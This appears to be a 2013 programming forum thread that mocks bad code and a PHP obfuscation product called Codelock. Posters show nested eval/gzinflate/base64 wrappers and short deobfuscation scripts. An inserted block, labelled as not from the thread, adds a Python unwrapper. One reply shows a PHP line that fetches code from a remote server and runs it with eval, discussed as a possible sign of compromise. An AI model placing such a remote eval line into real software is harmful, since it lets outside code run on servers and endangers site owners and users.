|
Gazpacho posted:Well if you decide to fix it be really careful and go slow and test everything. In my previous job I rewrote some copy-pasted code to about a tenth of the code size and felt really good about it until a customer site in Japan said they were broken. (I had left one of their copies out of the new version.) ASP MVC automatically HTML encodes any string variables that are used in a template, unless you first pass the value to Html.Raw. So in that guy's original code, he literally could just do: code:
|
# ? Jan 12, 2013 05:17 |
|
I know that and it doesn't change what I said.
|
# ? Jan 12, 2013 10:41 |
|
Definitely not going to touch any of that poo poo unless I have to. If a change or fix requires a decent amount of work on a page, then I'll redo the page, if only because the messed up outlining and complete lack of any structure makes it really hard to find anything. But the stuff I posted is just the tip of the iceberg, the real problems are far more serious. Technically it's an MVC web site, but so far, I've hardly seen any use of the "M", instead everything is passed through the ViewBag/ViewData. There's 50+ pages, almost all with dynamic content, but somehow less than 10 Model classes. The Session is also misused terribly (big surprise), yesterday I found a Controller action that stuck all sorts of stuff in the Session, then called a method, which proceeded to pull that same stuff out of the Session, instead of just simply passing it as method parameters. I fixed that, but because everything is copy-pasted everywhere, I know I can just open up any other Controller and find the exact same crap. Add onto that that everything that's put in the Session is needlessly converted to a string first, so there's a ton of parsing code spread all over the place.
|
# ? Jan 12, 2013 20:39 |
|
Man, I thought the MVC app I had to deal with was bad. We have tons of Controllers that do way too much, but at least we use Models. That sounds like a nightmare.
|
# ? Jan 12, 2013 22:12 |
|
A new client just emailed me asking if I could fix their site. Here's the error: code:
|
# ? Jan 15, 2013 00:38 |
|
That's probably not a coding horror on their end. When you google for wordpress help, you get things with a lot of recursive eval()s in order to sneak malicious and/or spammy stuff in. For some reason, people who would never just install random crap on their personal computer think it's okay to do that on their servers.
|
# ? Jan 15, 2013 00:48 |
bobthecheese posted:A new client just emailed me asking if I could fix their site. Here's the error:
php:
<?php eval(file_get_contents("http://myserver.com/include/maininclude.php.txt"));
But ^^^ yeah it may very well be a sign that they were hacked.
|
|
# ? Jan 15, 2013 00:50 |
|
I guess this isn't code but it made me laugh, as this guy usually writes with cold efficiency and organizational rigidity. Random txt file in some folder in XCode:
BUGS:
-BS loving ;laskdjf Target retain issue w/ decoding
-why the gently caress are tiles above character where doors are? Oh wait I know nvm it's fine.
-Corpses moving around on pan
-break up invent logic away from giant tumor method gently caress me
-MAP hosed up missing connections
-call nan
-tiles not matching up next to the thing
Awesome dude. CALL NAN.
|
# ? Jan 15, 2013 01:40 |
|
C++ code:
|
# ? Jan 15, 2013 02:26 |
|
nielsm posted:
Pulled down the code. Not hacked... "encrypted".
php:
<?
/* WARNING: This script is protected. Any attempt to reverse engineer, debug or de-code this file or its dependent files is strictly prohibited */
?>
To be fair, the "encryption" is just repeatedly gzdeflate(base64encode(the code)), so it'll be annoying to get at, but not impossible.
php:
<?
eval(gzinflate(base64_decode($codelock_lock)));
?>
|
# ? Jan 15, 2013 02:28 |
|
Code lock defeated:
php:
<?
$codelock_lock = gzinflate(base64_decode($codelock_lock));
while (strpos($codelock_lock, 'eval') === 0) {
    $codelock_lock = gzinflate(base64_decode(str_replace(array('eval(', 'gzinflate(', 'base64_decode(', ')'), '', $codelock_lock)));
}
echo $codelock_lock."\n";
?>
#EDIT:
quote:Codelock for PHP is a strong deterrent. Most end users will not be able to decipher your code and will have a difficult time working through the encryption used by the software. It will take more than the average programmer to decipher your scripts. The fact is, any PHP encryption program does needs to decrypt the file at some time, so the code will theoretically be available to experienced crackers during its execution. However, it would take considerable expertise, a lot of time and a rewrite of some of the core PHP decode engine (codelock.php) to get at it. Note: The Decryptor file (codelock.php) is also Encrypted. As well as all this, it would be a violation of our reverse engineering policy.
Apparently I'm a skilled cracker now.
bobthecheese fucked around with this message at 02:52 on Jan 15, 2013 |
# ? Jan 15, 2013 02:45 |
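Added example, not part of any post in this thread and not Codelock's code: a Python unwrapper that peels the eval(gzinflate(base64_decode(...))) layers statically, so a packed file of unknown origin can be read without executing any PHP. It assumes each layer is one statement wrapping a quoted string literal; `wrap`, `unwrap`, the layer cap and the size cap are names and limits chosen for this example, and the sample input is constructed.

```python
import base64
import re
import zlib

# One layer: eval(gzinflate(base64_decode('<base64>')));
LAYER = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*"
    r"(['\"])([A-Za-z0-9+/=\s]+)\1\s*\)\s*\)\s*\)\s*;?"
)


def wrap(php_source: str, layers: int) -> str:
    """Build a constructed sample: base64(raw deflate(code)) wrapped in eval, repeated."""
    for _ in range(layers):
        # wbits=-15 gives a raw deflate stream, the format PHP's gzinflate() reads.
        deflater = zlib.compressobj(9, zlib.DEFLATED, -15)
        packed = deflater.compress(php_source.encode()) + deflater.flush()
        php_source = "eval(gzinflate(base64_decode('%s')));" % base64.b64encode(packed).decode()
    return php_source


def unwrap(php_source: str, max_layers: int = 50, max_bytes: int = 5_000_000):
    """Peel layers without running them; return (innermost source, layers peeled)."""
    peeled = 0
    while peeled < max_layers:
        match = LAYER.fullmatch(php_source.strip())
        if not match:
            break  # not a pure wrapper any more: this is the code to review
        blob = base64.b64decode(match.group(2))
        inflater = zlib.decompressobj(-15)
        out = inflater.decompress(blob, max_bytes)
        if not inflater.eof:
            # Stream did not finish: truncated input or output larger than the cap.
            raise ValueError("layer %d is truncated or expands past max_bytes" % (peeled + 1))
        php_source = out.decode("utf-8", errors="replace")
        peeled += 1
    return php_source, peeled


if __name__ == "__main__":
    sample = wrap("echo 'licensed build';", 7)  # constructed input
    source, depth = unwrap(sample)
    print(depth, "layers ->", source)
```

The layer count is a useful triage signal on its own: ordinary application code has no reason to nest this wrapper several levels deep.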
|
Looks like they used an actual photo of a Codelock user in their banner: "eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1) : eval()'d code(1)? What the gently caress is this, have I been hacked?" The Gripper fucked around with this message at 03:07 on Jan 15, 2013 |
# ? Jan 15, 2013 03:03 |
Well their "HTML encryption" scheme is slightly more complex. It involves this snippet getting unescape()'d and eval()'d, then used to "decrypt" the rest of the document.
JavaScript code:
|
|
# ? Jan 15, 2013 03:12 |
|
This is security through obscurity taken to its logical conclusion.
|
# ? Jan 15, 2013 06:16 |
|
Harvey Mantaco posted:CALL NAN. What a maroon! code:
|
# ? Jan 15, 2013 06:48 |
|
Am I wrong or does this Codelock thing require you to uncompress/decode the script each time the page is loaded? It seems like that's a great way to waste cycles on every request by adding 2->n "decryption" steps every time.
|
# ? Jan 15, 2013 06:51 |
|
Anything that actually uses codelock is likely to be sufficiently awful that the codelock overhead is relatively minor.
|
# ? Jan 15, 2013 06:53 |
|
bobthecheese posted:Pulled down the code. Not hacked... "encrypted". Besides, look at CodeLock's website: code:
|
# ? Jan 15, 2013 07:08 |
|
Holy poo poo is that actually BBCode in a comment? Though I guess it kind of makes sense if you expect clueless idiots to copy-paste it everywhere asking for help.
|
# ? Jan 15, 2013 09:06 |
|
Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. e: Source-diving the trial (which is just a bunch of base64ed PHP) is amazing. Opinion Haver fucked around with this message at 09:23 on Jan 15, 2013 |
# ? Jan 15, 2013 09:09 |
|
Jabor posted:Holy poo poo is that actually BBCode in a comment? No, the forums just do that automatically. Try it out.
|
# ? Jan 15, 2013 09:19 |
|
yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. codelock posted:Return URLs - For some credit card processing companies (such as PAYPAL and EGOLD) it is possible to view the source of web pages and look at the return (thanks for purchasing) page, where you can directly go to the URL, click on the link to download the software without paying for it
|
# ? Jan 15, 2013 09:36 |
|
Suspicious Dish posted:No, the forums just do that automatically. Try it out. code:
Okay yeah, I turned off that little checkbox. Seems like a dumb feature though.
|
# ? Jan 15, 2013 09:58 |
|
Zamujasa posted:When I'm looking over hacked Wordpress installs that's basically the same thing I see; gzinflate, base64 decode, eval. So when you say "hacked", do you mean someone actually broke in or someone decided to install a smilies plugin with obfuscated source code? yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then. quote:If you have a clever script (i.e. written in PHP) Riiiighhht....
|
# ? Jan 15, 2013 10:36 |
|
ultramiraculous posted:
Did they mean to say that or do they just not know what id est means?
|
# ? Jan 15, 2013 12:34 |
|
Optimus Prime Ribs posted:
|
# ? Jan 15, 2013 12:41 |
|
yaoi prophet posted:Hey, man, do you want people to steal your images? No? Better encrypt your PHP then.
php:
<?
@chmod("$codelock_enc", 0777);
$codelock_fp2 = @fopen("$codelock_enc", "wb");
if ($codelock_fp2) {
} else {
    echo "<br /><b>Error!</b> There is a write permission problem. You need to CHMOD the file: <b>$codelock_enc</b> to 777.";
    die();
}
?>
|
# ? Jan 15, 2013 17:35 |
|
Munkeymon posted:How do you go around so willfully ignorant as to not even look up the conditional operators.
|
# ? Jan 15, 2013 17:43 |
|
The Gripper posted:It's creative obfuscation - make the reader so angry he can't read any more. Doesn't seem to be working, this code is as absorbing as a car crash: code:
code:
|
# ? Jan 15, 2013 18:39 |
qntm posted:And every single variable's name starts with "codelock" I do this too, when developing plugins for CMSes. I'm always careful with the scope of my variables, but it can't hurt to have unique variable names just in case.
|
|
# ? Jan 15, 2013 19:00 |
|
Munkeymon posted:These guys are just chock full of good advice. Also, they use that empty conditional block idiom all over the loving place that drives me goddamn nuts when I see it. How do you go around so willfully ignorant as to not even look up the conditional operators.
|
# ? Jan 15, 2013 19:05 |
|
Eruonen posted:I do this too, when developing plugins for CMSes. I'm always careful with the scope of my variables, but it can't hurt to have unique variable names just in case. Perhaps, if there were some way to put associated Names in their own Space, we wouldn't have to prefix them ourselves to prevent Collisions. But alack!, such a technology is beyond our grasp, despite our most earnest Declarations.
|
# ? Jan 15, 2013 19:07 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !.
|
# ? Jan 15, 2013 19:15 |
|
ultramiraculous posted:So when you say "hacked", do you mean someone actually broke in or someone decided to install a smilies plugin with obfuscated source code? I'm talking about malware pages that get in through a plugin, but even in other cases. I've had one instance where a file was somehow uploaded with no other vulnerable PHP code (just some basic pages that had no file operations or user-input other than numbers for math/gd). Stuff like remote shells/file managers. It's not always stupid plugins that are vulnerable, either. Plenty of well-known WordPress plugins are vulnerable, especially if you don't keep it up to date. I'm kind of disappointed that their site didn't feature any obfuscation or anti-rightclick Javascript, though. I was hoping for something more exciting.
|
# ? Jan 15, 2013 19:18 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. It's true, comprehending code does become rather difficult when you start ignoring random characters.
|
# ? Jan 15, 2013 20:57 |
|
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. yeah, but then there are tons of empty else branches all over the place.
|
# ? Jan 15, 2013 21:57 |
|
Aleksei Vasiliev posted:So use == false or something, not an empty true block. In fact using false == function() is better still.
|
# ? Jan 15, 2013 21:59 |
Plorkyeran posted:That's probably a deliberate style choice rather than ignorance. There's a certain group of people that think you should do that rather than negating the conditional because they think it's too easy to miss the !. Not the same problem, but this reminded me of when I found a if (!(!(object))) once.
|
|
# ? Jan 15, 2013 22:19 |
|
Manslaughter posted:Not the same problem, but this reminded me of when I found a if (!(!(object))) once. The !!expr construct is a somewhat common pattern in a few languages; you can think of !! as the cast-to-bool operator, because it normalizes the following expression to be exactly true or false, which is sometimes desirable.
|
# ? Jan 15, 2013 22:30 |
|
Manslaughter posted:Not the same problem, but this reminded me of when I found a if (!(!(object))) once. Double not is a C idiom to normalize a value into the normal 0/1 boolean form. e: foiled by the slowness of phone posting
|
# ? Jan 15, 2013 22:32 |